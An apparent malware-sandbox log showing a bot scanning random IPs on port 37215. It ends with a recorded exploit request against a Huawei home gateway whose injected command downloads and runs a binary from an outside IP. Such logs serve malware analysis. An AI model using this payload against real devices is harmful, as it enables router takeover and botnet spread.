          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.209.12.205:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 31.51.177.177:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 122.35.17.163:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 138.152.232.84:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.128.91.5:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.129.215.36:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.11.224.144:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.19.132.97:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 31.135.44.2:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.245.57.25:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 122.213.72.63:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 122.208.60.253:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.107.252.157:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.206.11.124:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 138.52.155.70:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.124.105.50:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 41.64.119.50:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 31.84.122.203:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.21.147.246:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 45.107.127.107:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 138.235.222.161:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.113.22.165:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.64.253.234:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.55.66.184:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 45.156.195.74:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.143.188.120:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.60.49.233:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.115.75.41:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 181.211.123.226:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.52.218.150:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.59.214.235:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.79.121.213:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 41.166.116.129:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 190.121.34.141:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 45.140.167.129:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.35.42.38:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 45.46.135.114:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 45.32.18.61:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.201.181.175:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 138.3.110.237:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.47.97.143:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 53.159.140.11:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 197.148.29.252:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.26.59.17:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 181.161.204.169:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.169.230.109:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.249.103.42:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.116.1.158:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 122.135.126.33:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.155.10.59:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.203.111.79:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.154.74.110:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 122.114.29.101:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.121.82.148:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.135.26.2:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 222.97.166.121:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 41.35.174.239:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 31.66.216.30:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 122.198.68.6:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.41.89.96:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 122.168.51.195:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.150.141.81:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 181.105.227.139:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 197.54.106.241:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.147.186.128:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.176.57.216:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.92.55.177:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.166.41.57:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.16.32.135:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.201.143.73:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 24.40.218.181:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 45.108.40.110:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.142.106.52:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 122.183.216.134:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.100.196.48:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.100.130.43:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.157.165.138:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.178.39.236:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.62.216.105:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 138.4.186.218:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.216.53.55:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.87.90.161:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 31.235.0.8:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.110.143.236:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.103.10.38:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 190.35.207.190:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 181.30.68.40:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.117.126.230:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 181.51.21.218:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 31.78.72.117:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.10.41.91:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.31.188.155:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.42.208.179:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.215.113.31:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.34.166.159:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.40.55.140:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.22.148.12:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 122.155.32.71:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.35.175.142:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 222.100.119.113:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 36.185.11.97:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.84.240.140:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.150.239.70:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 222.172.33.230:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.175.49.36:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.91.18.213:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 190.42.156.33:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 41.21.146.50:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.193.16.153:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.180.158.121:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.227.254.245:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 41.240.34.240:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 45.13.136.239:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.145.97.231:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 45.242.83.209:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 221.142.50.109:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.236.159.200:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.33.199.213:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.52.151.74:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.120.199.36:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.70.129.198:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 222.55.90.157:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.40.24.56:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.175.97.108:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 122.188.199.246:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.85.52.168:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.245.2.54:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 181.59.77.70:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.96.81.22:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.47.11.2:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 181.228.249.248:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 54.81.173.89:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.174.107.118:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.15.224.124:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 31.246.67.93:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 222.66.106.16:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.241.30.124:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 187.250.228.235:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.248.2.44:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 45.17.169.25:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.166.136.52:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.47.156.231:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 45.65.191.173:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.138.42.239:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.186.129.130:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.17.29.103:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 190.133.205.225:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.223.174.71:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.141.249.95:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.28.49.172:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 138.47.201.112:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 176.106.118.50:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 122.5.125.211:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.8.158.26:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 197.240.44.194:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 197.216.56.131:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 190.167.80.204:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.85.209.220:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.30.124.33:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.0.152.67:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 222.91.201.87:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 222.85.251.13:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.101.244.140:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 222.98.83.92:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 45.193.217.220:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 222.23.134.188:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 45.184.80.229:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 190.87.184.211:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.242.89.172:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 138.98.143.85:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 138.141.116.66:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 138.77.150.70:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 138.178.167.204:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.245.67.241:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 41.188.3.248:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 181.38.3.172:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.249.13.231:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 41.122.3.180:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 41.8.39.63:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.101.229.13:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 31.192.132.43:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.45.52.223:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 190.139.1.49:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 138.238.13.218:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 197.73.71.202:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.232.254.236:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 138.255.87.107:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.201.209.199:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 31.79.14.119:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 222.103.147.205:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.103.147.90:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 181.52.139.211:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.42.247.16:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 190.74.162.202:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.172.72.23:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.237.100.114:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.35.239.108:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.9.74.199:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.96.148.163:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.170.159.171:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.97.88.131:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.135.16.250:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.1.165.131:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.218.101.203:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.25.82.217:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.135.74.201:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.211.214.22:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 138.0.121.207:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 41.156.48.15:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 181.210.161.93:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.71.57.22:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.251.153.147:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.238.229.255:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.195.104.57:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.51.187.247:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.144.174.59:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.107.54.122:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 190.217.114.138:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.218.137.163:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 41.86.31.228:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 122.23.108.53:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 190.96.252.92:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 45.206.91.31:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.168.232.222:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 138.202.77.196:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.164.16.168:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.113.93.100:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 122.79.0.255:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.10.4.41:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 135.241.59.195:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 181.214.20.123:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 222.49.74.144:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 12.206.74.231:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 52.154.203.250:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 31.177.172.49:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 222.253.117.81:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.74.146.95:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.40.224.165:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.222.77.190:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.140.68.147:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.109.77.132:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 122.88.46.241:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.168.186.79:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 31.100.214.141:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 222.239.196.117:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 45.215.84.194:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.75.26.255:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.4.180.30:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.97.2.163:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 190.160.225.64:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.203.58.223:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 138.133.84.151:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.92.8.111:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.240.133.158:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.230.185.28:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 197.250.153.241:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.145.57.221:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.27.141.228:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.128.251.185:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.39.92.142:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 41.72.13.1:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 41.233.84.39:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.168.0.51:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.46.35.195:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 197.137.168.80:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 197.108.167.87:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.124.6.208:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.255.245.81:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.128.172.63:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.99.176.143:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.254.181.193:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.69.247.70:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 222.254.67.84:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 41.158.55.14:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 31.184.3.63:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 122.49.78.119:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.88.243.105:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.228.92.51:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 47.229.242.171:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.38.199.62:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 197.39.79.53:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 222.51.235.111:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.163.253.8:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 37.64.93.95:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 190.203.241.216:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 138.105.103.49:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 163.22.97.15:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 181.139.178.5:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.65.222.28:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 138.140.118.226:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 222.61.230.59:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 45.242.206.45:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 41.112.130.99:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 181.141.63.188:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 94.155.249.223:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.117.146.140:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 109.56.126.185:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.230.147.184:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.125.154.135:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 102.195.229.74:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 190.247.119.130:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.161.44.214:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 190.135.138.52:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 197.167.239.154:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.146.189.97:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 122.241.10.171:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.62.31.123:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 211.13.10.60:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 190.52.69.231:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 157.208.136.162:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 45.214.75.117:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 181.112.120.47:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 186.35.22.208:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 121.111.219.254:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 222.15.227.211:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 190.87.175.249:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 45.199.45.253:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 41.254.74.117:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 31.90.228.143:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 138.25.122.159:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 31.49.62.125:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 222.251.112.154:37215
          Source: global trafficTCP traffic: 192.168.2.15:44569 -> 156.79.247.135:37215
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
